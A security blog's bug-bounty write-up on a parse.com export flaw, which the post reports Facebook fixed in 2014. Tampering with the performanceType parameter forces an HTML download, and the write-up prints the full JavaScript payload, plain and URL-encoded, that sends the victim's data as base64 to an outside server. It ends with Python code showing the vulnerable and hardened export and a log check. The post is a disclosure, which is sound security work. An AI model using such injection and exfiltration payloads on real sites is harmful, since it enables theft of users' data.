Safetech Blog - Security Tips and Tricks


by Ionut Cernica

Parse.com security problem

This is a writeup of a security problem on the parse.com website. Parse.com was acquired by Facebook, and every security problem on this website is eligible for a bounty in the Facebook bug bounty program.


There was a problem with the download URL used to export important information about the applications you manage on your account.

The proof of concept below was made on Windows 7 Ultimate and was tested in IE, Chrome and Firefox.


Go to your parse.com account and try to download a file with important data:

[Image 1: the download button in the parse.com dashboard]


After pressing the button from the image above, the following request is sent to the server:


www.parse.com/apps/…………………………………&endpoints[1][performanceType]=request_limit


The last parameter of our request is endpoints[1][performanceType]. If its value is changed to request_limit.html", the downloaded file is no longer a .csv file but an .html file.


As a proof of concept of the idea above, I sent the following GET request to the server:

www.parse.com/apps/…………………………………….&endpoints[1][performanceType]=request_limit.html


The response was:

[Image 2: the server response to the modified request]


In Chrome and IE this didn't work, but after a little research (1 hour) I found out how to force the file extension from .csv to .html in Chrome and IE.

To make it work in IE and Chrome, change .html" to .html-Payload-".html;-Payload


PROOF OF CONCEPT:

Authenticate in your parse.com account.


My malicious payload is:


.html"JUNKCODEJUNKCODEJUNKCODE.html;<html><body onload='getValue()'><script>function utf8_to_b64( str ){return window.btoa(unescape(encodeURIComponent( str )));}function getValue(){var x = utf8_to_b64(document.getElementById('test').innerHTML);document.location= 'http://www.whit3hat.com/****for_private_reasons_I_hide_this_url****/1.php?n='+x;}</script><h1 id='test'>HERE_WILL_BE_IMPORTANT_DATA_FROM_VICTIM


If our victim clicks on:


www.parse.com/apps/……………………..&endpoints[1][performanceType]=request_limit.html"JUNKCODEJUNKCODEJUNKCODE.html;<html><body onload='getValue()'><script>function utf8_to_b64( str ){return window.btoa(unescape(encodeURIComponent( str )));}function getValue(){var x = utf8_to_b64(document.getElementById('test').innerHTML);document.location= 'http://www.whit3hat.com/**********?n='+x;}</script><h1 id='test'>"


The victim will download an HTML file that contains our malicious HTML+JavaScript payload. The payload above copies all the text after <h1 id='test'>, encodes it in base64 and sends it to a server I control.


So, first send the request to the server (I used URL encoding):

www.parse.com/apps/……………&endpoints%5B1%5D%5BperformanceType%5D=request_limit%2e%68%74%6d%6c%22%4a%55%4e%4b%43%4f%44%45%4a%55%4e%4b%43%4f%44%45%4a%55%4e%4b%43%4f%44%45%2e%68%74%6d%6c%3b%3c%68%74%6d%6c%3e%3c%62%6f%64%79%20%6f%6e%6c%6f%61%64%3d%27%67%65%74%56%61%6c%75%65%28%29%27%3e%2e%68%74%6d%6c%3b%3c%73%63%72%69%70%74%3e%66%75%6e%63%74%69%6f%6e%20%75%74%66%38%5f%74%6f%5f%62%36%34%28%20%73%74%72%20%29%7b%72%65%74%75%72%6e%20%77%69%6e%64%6f%77%2e%62%74%6f%61%28%75%6e%65%73%63%61%70%65%28%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%20%73%74%72%20%29%29%29%3b%7d%66%75%6e%63%74%69%6f%6e%20%67%65%74%56%61%6c%75%65%28%29%7b%76%61%72%20%78%20%3d%20%75%74%66%38%5f%74%6f%5f%62%36%34%28%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%27%74%65%73%74%27%29%2e%69%6e%6e%65%72%48%54%4d%4c%29%3b%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%77%68%69%74%33%68%61%74%2e%63%6f%6d%2f%74%65%73%74%2f%31%2e%70%68%70%3f%6e%3d%27%2b%78%3b%7d%3c%2f%73%63%72%69%70%74%3e%3c%68%31%20%69%64%3d%27%74%65%73%74%27%3e%22


The URL-encoded part is my malicious payload.

The response will be (Chrome browser, but it was also tested in IE and Firefox and worked):

[Image 3: the browser response to the URL-encoded request]


Chrome automatically downloaded the file as html.

This security problem requires user interaction: if the downloaded file is opened, all the data is sent to my server:

[Image 4: the downloaded HTML file being opened]


If I look into the logs, I find the following data:

ip: 83.***.***.** Data:IiIiCjIwMTQtMDYtMTdUMjA6MDA6MDAuMDAwWiwwLDAKMjAxNC0wNi0xN1QyMDowMTowMC4wMDBaLDA…………………………………………………………………………………………….


As you can see, the content of the HTML file was sent to my server as base64. I used base64 because of the newline character \n (0x0a) in the HTML file.
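The defect described above and its fix, as an added example in Python that is not code from the original post or from Parse: the performanceType value is concatenated unchecked into the download filename and echoed as the first CSV line, against an allow-listed value with an RFC 6266 encoded filename, quoted CSV cells and X-Content-Type-Options: nosniff; the last function is a log check that flags requests carrying such values. The function names, the allow-list, and the assumption that the filename is sent in a Content-Disposition header (which the " and ; in the payload suggest, but the page does not state) are mine.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Values the export endpoint should accept (constructed allow-list).
ALLOWED_PERFORMANCE_TYPES = frozenset({"request_limit", "api_requests", "latency"})

# Quote and semicolon escape from a quoted-string filename, CR/LF inject new
# headers, and '<' gives a browser something to render as HTML.
_UNSAFE = re.compile(r'[";\r\n<>\\\x00-\x1f]')


def csv_cell(value):
    """RFC 4180 quoting: wrap the cell in quotes and double embedded quotes."""
    return '"' + value.replace('"', '""') + '"'


def vulnerable_export(performance_type, rows):
    """Mirrors the bug described above (assumed server logic): the parameter is
    concatenated unchecked into the filename and echoed as the first CSV line."""
    headers = {
        "Content-Type": "text/csv",
        "Content-Disposition": 'attachment; filename="%s.csv"' % performance_type,
    }
    body = performance_type + "\n" + "\n".join(",".join(r) for r in rows) + "\n"
    return headers, body


def hardened_export(performance_type, rows):
    """Same endpoint with the fixes: allow-list the value, encode the filename
    per RFC 6266/5987, quote every CSV cell, and forbid MIME sniffing."""
    if performance_type not in ALLOWED_PERFORMANCE_TYPES:
        raise ValueError("unknown performanceType: %r" % performance_type)
    filename = performance_type + ".csv"
    headers = {
        "Content-Type": "text/csv; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": "attachment; filename=\"%s\"; filename*=UTF-8''%s"
        % (filename, quote(filename, safe="")),
    }
    body = csv_cell(performance_type) + "\n"
    body += "\n".join(",".join(csv_cell(c) for c in r) for r in rows) + "\n"
    return headers, body


def suspicious_performance_types(url):
    """Log check: performanceType values in a request URL that are not on the
    allow-list or contain characters usable for header/content injection."""
    params = parse_qs(urlsplit(url).query)
    values = [v for k, vs in params.items() if k.endswith("[performanceType]") for v in vs]
    return [v for v in values if v not in ALLOWED_PERFORMANCE_TYPES or _UNSAFE.search(v)]
```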


I was impressed that the Facebook team moved quickly:

Reported: 16 June 2014

Fixed: 20 June 2014
